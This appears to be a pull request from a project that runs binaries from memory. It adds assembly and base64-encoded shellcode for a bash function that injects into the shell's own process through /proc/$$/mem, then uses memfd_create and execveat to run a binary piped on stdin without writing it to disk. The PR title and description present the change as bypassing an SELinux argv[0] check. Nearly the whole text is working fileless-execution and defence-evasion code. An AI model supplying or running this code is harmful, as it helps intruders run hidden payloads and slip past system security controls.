### PR TITLE
update memexec-bash to bypass selinux argv[0] NULL check

### DIFF
--- a/memexec-bash.asm
+++ b/memexec-bash.asm
@@ -1,0 +1,59 @@
+section .text
+    global _start                    ; Entry point for the program
+
+_start:
+    ; create a buffer
+    mov rbp, rsp
+    sub rsp, 1042                         
+
+    mov  rax, 0x6c656e72656b    ; kernel
+    push 0                                    
+    push rax
+
+    mov rax, 319           ; memfd_create
+    mov rdi, rsp           ; name - kernel
+    xor rsi, rsi           ; no MFD_CLOEXEC
+    syscall
+    mov r8, rax            ; save memfd number
+
+
+rw_loop:
+    mov rax, 0             ; read
+    mov rdi, 0             ; stdin
+    mov rsi, rsp           ; pointer to buffer
+    mov rdx, 1024          ; number of bytes to read at time
+    syscall
+    mov rdx, rax           ; store no of bytes read in rdx
+
+    ; check if we reached the end of the file
+    cmp rdx, 0
+    jle exit               ; if bytes read is 0, close the file
+
+    ; write data to mem_fd
+    mov rax, 1
+    mov rdi, 3            ; mem_fd number
+    mov rsi, rsp          ; buffer
+    ;rdx already has the amount of bytes previously read
+    syscall
+
+    jmp rw_loop
+
+
+exit:
+    ; execveat the program in memfd
+
+    mov     rax, 322    ; execveat
+    mov     rdi, r8     ; memfd
+    push    0
+    mov     rsi, rsp    ; path (empty string)
+    push    0
+    push    rsp
+    mov     rdx, rsp    ; ARGV (pointer to a array containing a pointer to a empty string)
+    mov     r8, 4096    ; AT_EMPTY_PATH
+    syscall
+
+
+    ; Exit the program
+    mov rax, 60                       ; syscall number for sys_exit
+    mov rdi, 99                       ; exit code 99
+    syscall

--- a/memexec-bash.nasm
+++ b/memexec-bash.nasm
@@ -14,7 +14,7 @@ _start:
     mov rdi, rsp           ; name - kernel
     xor rsi, rsi           ; no MFD_CLOEXEC
     syscall
-    mov r8, rax            ; save memfd number
+    mov r8, rax            ; save memfd number           
 
 
 rw_loop:
@@ -22,7 +22,7 @@ rw_loop:
     mov rdi, 0             ; stdin
     mov rsi, rsp           ; pointer to buffer
     mov rdx, 1024          ; number of bytes to read at time
-    syscall
+    syscall              
     mov rdx, rax           ; store no of bytes read in rdx
 
     ; check if we reached the end of the file
@@ -31,17 +31,16 @@ rw_loop:
 
     ; write data to mem_fd
     mov rax, 1
-    mov rdi, 3            ; mem_fd number
-    mov rsi, rsp          ; buffer
+    mov rdi, r8            ; mem_fd number
+    mov rsi, rsp           ; buffer
     ;rdx already has the amount of bytes previously read
-    syscall
+    syscall               
 
     jmp rw_loop
 
 
 exit:
     ; execveat the program in memfd
-
     mov     rax, 322    ; execveat
     mov     rdi, r8     ; memfd
     push    0
@@ -49,11 +48,14 @@ exit:
     push    0
     push    rsp
     mov     rdx, rsp    ; ARGV (pointer to a array containing a pointer to a empty string)
+    xor     rcx, rcx    ; arg 4: ENV ?
+    xor     r9, r9      ; arg 4: ENV ?
+    xor     r10, r10    ; arg 4: ENV
     mov     r8, 4096    ; AT_EMPTY_PATH
-    syscall
+    syscall    
 
 
     ; Exit the program
     mov rax, 60                       ; syscall number for sys_exit
     mov rdi, 99                       ; exit code 99
-    syscall
+    syscall                           

--- a/memexec-bash.sh
+++ b/memexec-bash.sh
@@ -1,6 +1,6 @@
 #! /bin/bash
 
-memexec() { bash -c 'cd /proc/$$;exec 4>mem;base64 -d<<<SInlSIHsEgQAAEi4a2VybmVsAABqAFC4PwEAAEiJ50gx9g8FSYnAuAAAAAC/AAAAAEiJ5roABAAADwVIicJIg/oAfhG4AQAAAL8DAAAASInmDwXr0rhCAQAATInHagBIieZqAFRIieJBuAAQAAAPBbg8AAAAv2MAAAAPBQ==|dd bs=1 seek=$[$(cat syscall|cut -f9 -d" ")]>&4'; }
+memexec() { bash -c 'cd /proc/$$;exec 4>mem;base64 -d<<<SInlSIHsEgQAAEi4a2VybmVsAABqAFC4PwEAAEiJ50gx9g8FSYnAuAAAAAC/AAAAAEiJ5roABAAADwVIicJIg/oAfg+4AQAAAEyJx0iJ5g8F69S4QgEAAEyJx2oASInmagBUSIniSDHJTTHJTTHSQbgAEAAADwW4PAAAAL9jAAAADwU=|dd bs=1 seek=$[$(cat syscall|cut -f9 -d" ")]>&4'; }
 
 # Example: cat /usr/bin/id | memexec 
 

--- a/memexec-bash.sh
+++ b/memexec-bash.sh
@@ -1,6 +1,6 @@
 #! /bin/bash
 
-memexec() { bash -c 'cd /proc/$$;exec 4>mem;base64 -d<<<SInlSIHsEgQAAGoASLhrZXJuZWwAAFC4PwEAAEiJ50gx9g8FSYnQuAAAAAC/AAAAAEiJ5roABAAADwVIicJIg/oAfhG4AQAAAL8DAAAASInmDwXr0rhCAQAATInHagBIieZIMdJIMclNMclNMdJBuAAQAAAPBbg8AAAAv2MAAAAPBQA=|dd bs=1 seek=$[$(cat syscall|cut -f9 -d" ")]>&4'; }
+memexec() { bash -c 'cd /proc/$$;exec 4>mem;base64 -d<<<SInlSIHsEgQAAEi4a2VybmVsAABqAFC4PwEAAEiJ50gx9g8FSYnAuAAAAAC/AAAAAEiJ5roABAAADwVIicJIg/oAfhG4AQAAAL8DAAAASInmDwXr0rhCAQAATInHagBIieZqAFRIieJBuAAQAAAPBbg8AAAAv2MAAAAPBQ==|dd bs=1 seek=$[$(cat syscall|cut -f9 -d" ")]>&4'; }
 
 # Example: cat /usr/bin/id | memexec 
 


### PR DESCRIPTION
SELinux terminates execution of program if argv[0] is NULL during execveat.

1. This patch  provides a valid argv with a empty string.
2. A separate file with the shellcode is also attached for reference. 